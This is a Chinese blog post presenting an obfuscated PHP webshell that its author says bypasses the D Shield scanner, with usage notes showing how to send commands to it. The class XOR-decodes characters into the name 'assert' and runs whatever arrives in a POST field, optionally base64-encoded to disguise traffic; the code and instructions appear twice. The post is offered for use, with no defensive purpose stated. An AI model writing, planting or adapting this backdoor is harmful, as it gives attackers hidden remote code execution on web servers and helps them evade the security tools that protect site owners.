免杀WebShell PHP一句话，过D盾

发表于 2019年08月03日
webshell , 免杀

目录表

免杀PHP一句话

过最新D盾等，webshell变量随机，增加流量传输编码方式

免杀WebShell PHP一句话，过D盾 — 免杀webshell PHP一句话

class LTDS
{
    public function __destruct()
    {
        $bxo='X'^"\x39";
        $woa='?'^"\x4c";
        $ukt='K'^"\x38";
        $gud='d'^"\x1";
        $fbu='_'^"\x2d";
        $agx='<'^"\x48";
        $HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx;
        return @$HLWV($this->OX);
    }
}
$ltds=new LTDS();
@$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8'];

class LTDS

{

public function __destruct()

{

$bxo='X'^"\x39";

$woa='?'^"\x4c";

$ukt='K'^"\x38";

$gud='d'^"\x1";

$fbu='_'^"\x2d";

$agx='<'^"\x48";

$HLWV=$bxo.$woa.$ukt.$gud.$fbu.$agx;

return @$HLWV($this->OX);

}

$ltds=new LTDS();

@$ltds->OX=isset($_GET['id'])?base64_decode($_POST['ua8']):$_POST['ua8'];

使用说明

是否传入id参数决定是否把流量编码

http://www.xxx.com/shell.php  
POST: ua8=phpinfo();  //与普通shell相同

http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)

POST: ua8=cGhwaW5mbygpOwo=  //payload的base64编码

http://www.xxx.com/shell.php

POST: ua8=phpinfo(); //与普通shell相同

http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)

POST: ua8=cGhwaW5mbygpOwo= //payload的base64编码